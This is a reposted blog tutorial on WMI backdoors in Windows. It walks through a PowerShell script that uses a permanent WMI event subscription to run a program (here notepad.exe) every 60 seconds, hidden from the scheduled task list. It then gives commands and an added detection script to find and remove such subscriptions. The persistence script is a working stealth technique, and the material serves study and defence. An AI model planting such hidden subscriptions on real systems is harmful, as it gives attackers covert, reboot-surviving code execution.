WMI ***, defense and forensic analysis techniques, *** part:
http://drops.xmd5.com/static/drops/tips-9973.html
WMI ***, defense and forensic analysis techniques, defense part:
http://drops.xmd5.com/static/drops/tips-10346.html
wp-windows-management-instrumentation.pdf:
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
WMI backdoor:
http://bobao.360.cn/learning/detail/628.html
How to record WMI persistence in the system event log:
http://www.4hou.com/technology/1860.html
(1) Make sure the WMI service is running
Start the service
Win+R, type wmic
(2) Write a PowerShell script that uses a WMI permanent event subscription to hide a scheduled task
The script is as follows:
$filterName = 'BotFilter82'
$consumerName = 'BotConsumer23'
$exePath = 'C:\Windows\System32\notepad.exe'
# Polling query: fires roughly every 60 seconds when the PerfOS_System counters change
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
# 1. Event filter: what to wait for (stored in root\subscription, query runs against root\cimv2)
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
# 2. Event consumer: what to run when the filter fires
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}
# 3. Binding: ties the filter to the consumer; the subscription is persistent across reboots
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
Open PowerShell
Start it with administrator rights:
Start-Process powershell -Verb runAs
Allow script execution:
Set-ExecutionPolicy RemoteSigned
Run result:
Process monitoring result:
What the script does:
Runs notepad.exe about every 60 s
The scheduled task list does not show it, so the task is effectively hidden:
0x04 WMI backdoor detection and removal:
1. List the current WMI event subscriptions
[requires administrator rights]
#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
2. Remove the backdoor (filter, consumer and binding all have to go)
#Filter
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose
#Consumer
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose
#Binding
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose
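The three listing commands above show filters, consumers and bindings separately. The following is an added example (not from the original post) that joins them so each binding is printed with its filter query and the command or script its consumer would run, flagging the consumer classes that execute code; it assumes the default "SCM Event Log" filter/consumer pair is the only expected entry and that the host logs subscription creation as WMI-Activity event 5861.

```powershell
# Added example, not from the original post. Run in an elevated PowerShell.
$ns = 'root\subscription'
# Assumption: these two default objects are the only legitimate entries on this host.
$knownGood = @('SCM Event Log Filter', 'SCM Event Log Consumer')

function Get-WmiSubscriptionReport {
    $filters   = Get-WmiObject -Namespace $ns -Class __EventFilter
    $consumers = Get-WmiObject -Namespace $ns -Class __EventConsumer
    $bindings  = Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding

    foreach ($b in $bindings) {
        # Get-WmiObject returns the Filter/Consumer references as strings such as
        # __EventFilter.Name="BotFilter82"; pull the Name out of each.
        $fName = if ("$($b.Filter)"   -match 'Name="([^"]+)"') { $Matches[1] } else { "$($b.Filter)" }
        $cName = if ("$($b.Consumer)" -match 'Name="([^"]+)"') { $Matches[1] } else { "$($b.Consumer)" }
        $f = $filters   | Where-Object { $_.Name -eq $fName }
        $c = $consumers | Where-Object { $_.Name -eq $cName }

        # What runs when the filter fires depends on the consumer class.
        $payload = switch ($c.__CLASS) {
            'CommandLineEventConsumer'  { "$($c.ExecutablePath) $($c.CommandLineTemplate)" }
            'ActiveScriptEventConsumer' { "$($c.ScriptingEngine): $($c.ScriptText)" }
            default                     { '' }
        }
        $suspicious = ($c.__CLASS -in 'CommandLineEventConsumer','ActiveScriptEventConsumer') -and
                      ($fName -notin $knownGood) -and ($cName -notin $knownGood)

        [pscustomobject]@{
            Filter     = $fName
            Query      = $f.Query
            Consumer   = $cName
            Type       = $c.__CLASS
            Payload    = $payload
            Suspicious = $suspicious
        }
    }
}

# Creation of a permanent subscription is recorded by the
# Microsoft-Windows-WMI-Activity/Operational log as event ID 5861 (Windows 10 / Server 2016 and later).
function Get-WmiSubscriptionEvents {
    Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-WMI-Activity/Operational'; Id=5861} -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Message
}

Get-WmiSubscriptionReport | Format-Table -AutoSize -Wrap
Get-WmiSubscriptionEvents | Format-List
```

Against the script from the first part of this post, the report row for BotFilter82 / BotConsumer23 shows the 60-second polling query and notepad.exe as the payload with Suspicious set to True.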
Taking a break.......... to be continued
Reposted from: https://blog.51cto.com/antivirusjo/2092545